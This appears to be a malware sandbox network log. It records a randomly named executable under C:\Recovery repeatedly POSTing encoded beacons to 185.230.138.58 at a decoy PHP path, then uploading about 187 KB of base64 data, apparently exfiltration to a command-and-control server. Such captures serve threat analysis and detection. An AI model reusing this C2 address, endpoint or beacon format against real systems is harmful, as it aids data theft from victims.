                                                                                                                                        Dec 21, 2024 10:07:30.347369909 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:30.581536055 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:30 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        6192.168.2.449746185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:31.141233921 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:31.498167038 CET1012OUTData Raw: 57 5f 5f 5e 5f 46 54 55 5b 59 51 56 59 5c 58 5a 56 52 5d 5e 5a 58 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W__^_FTU[YQVY\XZVR]^ZX[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C;1#7$1,9*-:S >=*?;&8+'W$/$'_3'^& X/0
                                                                                                                                        Dec 21, 2024 10:07:32.388468981 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:32.624193907 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:32 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        7192.168.2.449748185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:32.634413004 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1888
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:32.982476950 CET1888OUTData Raw: 57 50 5f 58 5a 40 54 54 5b 59 51 56 59 5f 58 58 56 5e 5d 57 5a 5e 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WP_XZ@TT[YQVY_XXV^]WZ^[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C8^#,#Y$<^>=2 >%*$&+)+:3W$3&''^& X/<
                                                                                                                                        Dec 21, 2024 10:07:33.884246111 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:34.120567083 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:33 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 25 5c 35 1b 23 10 26 04 27 1f 24 00 00 5c 3f 2e 09 18 30 05 3d 40 23 55 38 5d 29 59 3f 5b 25 2e 36 5d 30 12 37 0f 3f 30 33 5a 2e 20 20 46 04 1c 20 07 3d 23 2a 14 29 3b 2b 00 2f 01 35 5b 29 32 0b 07 21 12 26 03 23 2d 25 05 23 31 35 19 3c 3a 3e 50 29 37 23 03 2d 2e 3a 5b 22 00 23 56 0b 1f 3a 0d 3d 33 3a 1d 27 27 1d 00 25 19 2e 12 21 35 3b 19 36 22 27 50 21 13 3f 11 31 16 39 03 21 38 05 0a 2a 3c 32 1d 26 39 01 08 2c 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98%\5#&'$\?.0=@#U8])Y?[%.6]07?03Z. F =#*);+/5[)2!&#-%#15<:>P)7#-.:["#V:=3:''%.!5;6"'P!?19!8*<2&9,=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        8192.168.2.449749185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:32.861941099 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:33.216869116 CET1012OUTData Raw: 57 5f 5a 5c 5f 47 54 53 5b 59 51 56 59 58 58 5f 56 59 5d 5d 5a 59 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W_Z\_GTS[YQVYXX_VY]]ZY[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/T?7%/5>.7=!>,#1<:/U3,06\0:'^& X/
                                                                                                                                        Dec 21, 2024 10:07:34.108730078 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:34.344594955 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:34 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        9192.168.2.449750185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:34.619174004 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:34.966933012 CET1012OUTData Raw: 57 55 5f 5b 5f 45 51 51 5b 59 51 56 59 5c 58 5e 56 5b 5d 5a 5a 50 5b 41 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WU_[_EQQ[YQVY\X^V[]ZZP[A[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/T$7$$?!)W4._*?%;9X(?'.?3$:'^& X/0
                                                                                                                                        Dec 21, 2024 10:07:35.883424997 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:36.116720915 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:35 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        10192.168.2.449751185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:36.467736959 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:36.846267939 CET1012OUTData Raw: 52 53 5f 50 5f 48 51 54 5b 59 51 56 59 58 58 5e 56 5a 5d 58 5a 51 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_P_HQT[YQVYXX^VZ]XZQ[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/ _!,&5*[% -%=4]&&+9/S'.+'%$:'^& X/
                                                                                                                                        Dec 21, 2024 10:07:37.712363005 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:37.948542118 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:37 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        11192.168.2.449752185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:38.200197935 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        12192.168.2.449753185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:38.603914022 CET495OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: multipart/form-data; boundary=----hMBq0KT2X8lvTQ5wT3fyVw6ZMMkyn3lLsI
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 186942
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:38.951354980 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 68 4d 42 71 30 4b 54 32 58 38 6c 76 54 51 35 77 54 33 66 79 56 77 36 5a 4d 4d 6b 79 6e 33 6c 4c 73 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                                        Data Ascii: ------hMBq0KT2X8lvTQ5wT3fyVw6ZMMkyn3lLsIContent-Disposition: form-data; name="0"Content-Type: text/plainWUZ[_BTS[YQVYZX^VS]YZX[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[
                                                                                                                                        Dec 21, 2024 10:07:39.071079016 CET2472OUTData Raw: 30 35 75 37 4a 38 68 65 56 33 37 30 57 47 71 43 54 66 6c 4b 62 73 47 59 63 62 4f 61 33 68 30 73 4b 37 49 36 36 2b 66 73 41 4e 5a 4a 74 4d 32 43 76 4e 65 46 70 4e 41 68 4f 37 41 51 44 6a 4b 50 30 59 51 43 6f 4f 59 2f 39 51 42 4d 4b 4f 43 6e 4b 68
                                                                                                                                        Data Ascii: 05u7J8heV370WGqCTflKbsGYcbOa3h0sK7I66+fsANZJtM2CvNeFpNAhO7AQDjKP0YQCoOY/9QBMKOCnKh15eogEiY2uL+yU1IDy36SIbNXS54b+6xvkYmghL3F9hh8FBRWSXjCdMhoUqtf1Nu0UxhIW4wGpdgiLzU1NSgmFk52A13CQkeCo28ibYTdhsAFjqgA8oY0aaR+to+uCh8POwqaSwiJkstTy4dXI4Qwoe2avS17NRWB
                                                                                                                                        Dec 21, 2024 10:07:39.071173906 CET2472OUTData Raw: 36 52 57 51 45 30 4e 78 31 65 6d 67 30 4e 33 4f 61 39 59 39 43 77 6a 79 4e 4b 49 79 77 4f 69 79 67 43 4d 42 69 5a 6f 71 61 5a 62 41 54 53 2b 4e 36 34 6a 51 58 67 6c 45 4a 44 47 4e 69 41 46 75 67 72 64 71 55 5a 57 4f 47 46 66 74 42 34 4c 74 44 61
                                                                                                                                        Data Ascii: 6RWQE0Nx1emg0N3Oa9Y9CwjyNKIywOiygCMBiZoqaZbATS+N64jQXglEJDGNiAFugrdqUZWOGFftB4LtDawPHuccdGtH5YDWGl2PTrFeu7VjdED7i/zdawodrqJ1wENLdbyUtp8254lAaoTcQmtnZ10K99ZcD5eryVrj/Mfjlu1BAePykFgWfK1z+Y7jnVHcT7ekJ+czxqXNG+sxSNfLk98Fq74qJqk+piM26taVQbCWNsxS14t
                                                                                                                                        Dec 21, 2024 10:07:39.071222067 CET2472OUTData Raw: 5a 4d 30 76 50 6f 51 6f 37 74 47 50 66 58 73 63 6f 53 6d 5a 42 7a 36 35 5a 6b 34 77 78 6f 77 47 62 4d 65 54 41 46 58 4c 32 64 78 46 50 61 34 73 59 52 2f 6e 76 53 58 58 47 46 50 48 4e 47 6c 54 69 36 33 72 37 39 57 7a 51 5a 37 53 6c 44 66 33 6a 4a
                                                                                                                                        Data Ascii: ZM0vPoQo7tGPfXscoSmZBz65Zk4wxowGbMeTAFXL2dxFPa4sYR/nvSXXGFPHNGlTi63r79WzQZ7SlDf3jJzixPGBBQzWa1okoHbiEFbS/0TvYfGYa+c5rOq95L3PXfBUfR4qisRuqRguZ2rz9H29E62u/6AZtcH2a5eHfbBCLOfu7q6XHqsdd2mhtpwSj8YTMyee+05Oc83bL3MIsz7c15oZEBUu39CHB8aESSOmtslvdExmej9
                                                                                                                                        Dec 21, 2024 10:07:39.071247101 CET2472OUTData Raw: 79 35 69 75 53 57 78 39 33 69 71 30 45 56 34 54 34 33 7a 51 50 65 36 52 46 54 73 63 72 33 51 39 73 46 64 36 49 72 4a 43 6e 49 6e 72 6b 31 4e 56 39 4e 47 48 48 44 2b 78 44 72 56 2b 59 73 47 4c 4b 63 4d 49 4b 74 33 65 52 51 36 73 68 2b 68 42 45 71
                                                                                                                                        Data Ascii: y5iuSWx93iq0EV4T43zQPe6RFTscr3Q9sFd6IrJCnInrk1NV9NGHHD+xDrV+YsGLKcMIKt3eRQ6sh+hBEqRWrekNrVFX50eqG5/qRaNmqjGwB/YZ9HOcuQEOdy3orIsEsvMKyrR3/RKNqC/cHr82fHnT0d35rBCtYV/cI/mpNyftBSRApZnamwSUondABpSsdxQX2RYiV7dBGyme5mgfcDkr7UkaYzGE9uyPzE2ax9uLeanjC1Z
                                                                                                                                        Dec 21, 2024 10:07:39.071302891 CET2472OUTData Raw: 4b 59 67 67 75 65 6d 37 74 2f 63 66 4e 4a 51 38 4e 7a 63 54 47 7a 64 76 41 70 2f 55 31 70 56 38 48 31 33 64 70 59 76 6f 39 59 6b 5a 6b 36 63 65 57 6c 59 32 62 70 7a 55 53 59 72 52 42 52 48 38 74 54 46 7a 6d 6d 39 6a 4a 4b 74 64 78 79 71 6a 4f 71
                                                                                                                                        Data Ascii: KYgguem7t/cfNJQ8NzcTGzdvAp/U1pV8H13dpYvo9YkZk6ceWlY2bpzUSYrRBRH8tTFzmm9jJKtdxyqjOqmSnwZxZFtxa3jUiHH0PWjHzY3FVqrPN9WP27ApHE9zsrU/kuo1fU5c4WCL6tisMEIis3i+lzOyrhpJu4tl2k13BY2ug1F2SyqgCWZg0D707kBlEJ3wqnxl/m11ls18/zZxL+zlgwilIfpSlUa25NklCioqLpcurl6
                                                                                                                                        Dec 21, 2024 10:07:39.071324110 CET2472OUTData Raw: 43 78 78 56 64 4f 6c 33 63 65 4b 53 34 56 31 79 52 45 63 45 6d 79 63 65 4f 59 49 39 44 50 47 4f 4c 4c 43 6b 46 52 52 65 4e 75 78 41 67 47 76 52 41 59 6d 42 59 2f 34 76 72 74 34 38 48 73 6f 33 65 68 39 2f 4a 4c 53 51 61 4b 79 52 55 44 46 45 61 4a
                                                                                                                                        Data Ascii: CxxVdOl3ceKS4V1yREcEmyceOYI9DPGOLLCkFRReNuxAgGvRAYmBY/4vrt48Hso3eh9/JLSQaKyRUDFEaJR9bezrKHuELEOU7MRYiox9l23EjH0JI4TIHslOWcu+7/s235nR+/P5/H5/eL0Y0/M8k/s+5zrnXNd1i+MAw2dcnhcx39BLXRhSOWeQK2apmX3aLUtgrfPhYV/JkjJShstQDAfs5Dp2sXKvyTRxskzG4DeLTn3mkow
                                                                                                                                        Dec 21, 2024 10:07:39.071461916 CET2472OUTData Raw: 58 39 50 67 78 72 67 70 70 48 76 71 68 32 7a 75 4b 4f 30 48 4a 71 62 72 2b 35 32 71 4a 77 48 57 4f 45 43 79 6e 4f 32 59 79 52 69 78 34 54 49 6a 38 73 31 68 59 67 77 48 6e 4e 2f 74 7a 39 70 56 58 63 4d 42 76 68 34 54 53 4f 64 71 2f 65 63 50 50 38
                                                                                                                                        Data Ascii: X9PgxrgppHvqh2zuKO0HJqbr+52qJwHWOECynO2YyRix4TIj8s1hYgwHnN/tz9pVXcMBvh4TSOdq/ecPP8PvOlabZbqzAlzdkRR/jQfcTjnjlb+y2my2L2+KjZSJs8Tf4VDmqio69xXFmzIDbXE4Lixu2x9dTGF/D/OvENKcy9HizsBDI8r/wTl3uDEZvtdAREYc9xmpmjEWNhlNfE0HwCc1oPk/WyLCBBP5DEQQkb0lkt5kCWw
                                                                                                                                        Dec 21, 2024 10:07:39.071479082 CET2472OUTData Raw: 5a 51 2f 6a 33 45 42 44 74 73 4a 54 46 38 43 55 56 71 4b 5a 46 56 4d 61 72 61 42 52 70 77 57 6b 4b 32 4e 51 34 5a 33 37 34 37 46 49 30 57 39 6f 51 62 42 67 31 31 39 56 35 5a 45 6c 61 43 42 35 7a 47 63 77 51 6b 58 65 58 79 53 6a 6b 54 61 6d 38 4a
                                                                                                                                        Data Ascii: ZQ/j3EBDtsJTF8CUVqKZFVMaraBRpwWkK2NQ4Z3747FI0W9oQbBg119V5ZElaCB5zGcwQkXeXySjkTam8J6tmJageLc7ZmoT3YlPRWymg6nhtQtSWMIMMVe8jxHGbIKlGQ8BekUhqfAmGPOlqz5YZpNEdNcWoUSZ9MEmbqefT99SNNTBV8kn3BLa3T0y5BSGGiKZGIqlJPluqjuCgwl1oFhK+ZXBANU0zXL249p5EgpDaRWT09l
                                                                                                                                        Dec 21, 2024 10:07:39.071537971 CET2472OUTData Raw: 6c 47 67 2b 75 74 32 51 48 4a 31 46 78 54 77 37 4f 58 7a 78 57 31 55 2f 55 79 2b 55 6f 6c 4f 2f 6b 4e 53 76 36 39 6c 45 6c 50 44 72 68 74 6e 4c 48 71 75 44 4e 6f 50 75 44 6a 63 72 6e 30 4c 61 71 32 6a 76 2f 52 35 32 35 4b 66 65 30 2b 75 34 30 58
                                                                                                                                        Data Ascii: lGg+ut2QHJ1FxTw7OXzxW1U/Uy+UolO/kNSv69lElPDrhtnLHquDNoPuDjcrn0Laq2jv/R525Kfe0+u40XwC1UrWrKusqqi0q7Twcp9B0vmPi2RCI+necOQYf+LiYjp+pxchXx38oskzIKJElq/20wsBpCgpBUAz4eV1Klcj+lewOKlrUnficPNYMytQ+q7KxfzNA4Rpr0LMz4QHX6Qjc0nC23/Z0nL84ZCsTOh6Wa+K2lPMyX3
                                                                                                                                        Dec 21, 2024 10:07:39.854584932 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:40.579251051 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:40 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0
                                                                                                                                        Dec 21, 2024 10:07:40.581924915 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1880
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:40.997273922 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:41.432450056 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:41 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 00 35 1b 24 0d 27 3d 05 52 33 07 2d 03 28 58 3f 5d 27 5a 26 1d 37 0d 20 59 3d 01 28 01 24 07 2e 5e 24 2c 37 0c 3e 20 37 5d 3a 30 20 46 04 1c 20 00 3d 33 03 0b 2a 16 09 00 38 01 3a 03 29 22 26 5f 22 02 2a 01 23 3e 2a 5a 23 21 2e 08 3c 00 31 0e 2a 34 2c 1d 39 3e 00 58 21 10 23 56 0b 1f 39 54 2a 30 2a 5b 30 0e 3f 05 26 0e 22 1d 20 36 3b 50 35 1c 27 57 35 13 3b 5c 25 5e 39 04 20 38 27 0e 3d 01 0c 13 32 07 0d 08 39 3d 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&5$'=R3-(X?]'Z&7 Y=($.^$,7> 7]:0 F =3*8:)"&_"*#>*Z#!.<1*4,9>X!#V9T*0*[0?&" 6;P5'W5;\%^9 8'=29=&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        13192.168.2.449754185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:38.723447084 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:39.076301098 CET1012OUTData Raw: 57 51 5a 5d 5a 43 51 52 5b 59 51 56 59 5e 58 50 56 5c 5d 58 5a 5b 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
